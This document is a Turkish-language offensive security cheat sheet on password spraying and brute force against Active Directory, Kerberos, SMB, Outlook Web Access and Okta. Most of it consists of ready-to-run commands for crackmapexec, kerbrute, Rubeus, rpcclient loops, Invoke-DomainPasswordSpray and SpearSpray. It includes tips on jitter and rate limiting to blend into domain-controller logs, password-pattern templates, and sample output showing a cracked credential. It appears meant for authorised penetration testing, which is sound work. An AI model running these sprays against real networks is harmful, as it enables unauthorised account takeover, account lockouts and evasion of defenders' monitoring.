Password Spraying / Brute Force

Reading time: 8 minutes

Password Spraying

Birkaç geçerli kullanıcı adı bulduktan sonra, keşfettiğiniz her kullanıcıyla ortamın parola politikasını göz önünde bulundurarak en yaygın parolaları deneyebilirsiniz.
Varsayılan olarak minimum parola uzunluğu 7'dir.

Yaygın kullanıcı adı listeleri de faydalı olabilir: https://github.com/insidetrust/statistically-likely-usernames

Unutmayın ki birkaç yanlış parola denerken bazı hesapları kilitleyebilirsiniz (varsayılan olarak genelde 10'dan fazladır).

Parola politikasını alma

Eğer bazı kullanıcı kimlik bilgilerine sahipseniz veya domain kullanıcısı olarak bir shell'e erişiminiz varsa parola politikasını şu şekilde alabilirsiniz:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Linux'tan İstismar (veya tüm platformlar)

• crackmapexec kullanarak:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

• kerbrute (Go) kullanarak

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

• spray (hesap kilitlenmelerini önlemek için deneme sayısını belirtebilirsiniz):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

• kerbrute kullanımı (python) - ÖNERİLMEZ, BAZEN ÇALIŞMAYABİLİR

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

• Metasploit'in scanner/smb/smb_login modülü ile:

• rpcclient kullanarak:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Windows'tan

• Rubeus brute modülüne sahip sürüm ile:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

• Invoke-DomainPasswordSpray ile (Varsayılan olarak domain'den kullanıcıları oluşturabilir ve parola politikasını domain'den alır ve denemeleri buna göre sınırlar):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

• Invoke-SprayEmptyPassword.ps1 ile

Invoke-SprayEmptyPassword

Brute Force

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)

Kerberos pre-auth–based spraying, SMB/NTLM/LDAP bind denemelerine göre gürültüyü azaltır ve AD kilitleme politikalarıyla daha iyi uyum sağlar. SpearSpray, LDAP kaynaklı hedefleme, bir desen motoru ve politika farkındalığını (domain policy + PSOs + badPwdCount buffer) birleştirerek hassas ve güvenli bir şekilde spray yapar. Ayrıca Neo4j'de ele geçirilmiş principal'leri BloodHound pathing için etiketleyebilir.

Key ideas:

• LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
• Domain lockout policy + PSO-aware filtering to leave a configurable attempt buffer (threshold) and avoid locking users.
• Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
• Pattern-based, per-user password generation using variables like names and temporal values derived from each user’s pwdLastSet.
• Throughput control with threads, jitter, and max requests per second.
• Optional Neo4j integration to mark owned users for BloodHound.

Basic usage and discovery:

# List available pattern variables
spearspray -l

# Basic run (LDAP bind over TCP/389)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local

# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl

Hedefleme ve desen kontrolü:

# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"

# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME

Gizlilik ve güvenlik kontrolleri:

# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10

# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2

Neo4j/BloodHound zenginleştirmesi:

spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687

Desen sistemi genel bakışı (patterns.txt):

# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
{month_en}{separator}{short_year}{suffix}
{season_en}{separator}{year}{suffix}
{samaccountname}
{extra}{separator}{year}{suffix}

Kullanılabilir değişkenler şunlardır:

• {name}, {samaccountname}
• Her kullanıcının pwdLastSet (veya whenCreated) değerinden türetilen zaman bileşenleri: {year}, {short_year}, {month_number}, {month_en}, {season_en}
• Kompozisyon yardımcıları ve organizasyon tokenı: {separator}, {suffix}, {extra}

Operasyonel notlar:

• En yetkili badPwdCount ve politika ile ilgili bilgileri okumak için -dc ile PDC-emulator'a sorgu göndermeyi tercih edin.
• badPwdCount sıfırlamaları, gözlem penceresinden sonraki bir sonraki denemede tetiklenir; güvenli kalmak için eşik ve zamanlamayı kullanın.
• Kerberos pre-auth denemeleri DC telemetrilerinde 4768/4771 olarak görünür; karışmak için jitter ve rate-limiting kullanın.

İpucu: SpearSpray’s default LDAP page size is 200; adjust with -lps as needed.

Outlook Web Access

password spraying outlook için birden fazla araç vardır.

• İle MSF Owa_login
• İle MSF Owa_ews_login
• İle Ruler (güvenilir!)
• İle DomainPasswordSpray (Powershell)
• İle MailSniper (Powershell)

Bu araçların herhangi birini kullanmak için bir kullanıcı listesine ve spray yapmak için bir password / küçük bir password listesine ihtiyacınız var.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

• https://github.com/ustayready/CredKing/blob/master/credking.py

Okta

• https://github.com/ustayready/CredKing/blob/master/credking.py
• https://github.com/Rhynorater/Okta-Password-Sprayer
• https://github.com/knavesec/CredMaster

Referanslar

• https://github.com/sikumy/spearspray
• https://github.com/TarlogicSecurity/kerbrute
• https://github.com/Greenwolf/Spray
• https://github.com/Hackndo/sprayhound
• https://github.com/login-securite/conpass
• https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
• https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
• www.blackhillsinfosec.com/?p=5296
• https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying